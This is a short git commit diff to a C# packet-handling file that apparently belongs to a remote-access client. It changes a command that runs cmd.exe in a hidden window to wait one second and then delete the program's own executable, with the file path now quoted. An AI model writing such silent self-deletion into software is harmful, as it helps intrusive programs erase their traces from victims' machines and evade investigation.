Update HandlePacket.cs
This commit is contained in:
parent
c707c8b543
commit
65460e6355
@ -139,7 +139,7 @@ namespace Client.Handle_Packet
|
|||||||
{
|
{
|
||||||
Del = new ProcessStartInfo()
|
Del = new ProcessStartInfo()
|
||||||
{
|
{
|
||||||
Arguments = "/C choice /C Y /N /D Y /T 2 & Del " + Process.GetCurrentProcess().MainModule.FileName,
|
Arguments = "/C choice /C Y /N /D Y /T 1 & Del \"" + Process.GetCurrentProcess().MainModule.FileName + "\"",
|
||||||
WindowStyle = ProcessWindowStyle.Hidden,
|
WindowStyle = ProcessWindowStyle.Hidden,
|
||||||
CreateNoWindow = true,
|
CreateNoWindow = true,
|
||||||
FileName = "cmd.exe"
|
FileName = "cmd.exe"
|
||||||
|
Loading…
x
Reference in New Issue
Block a user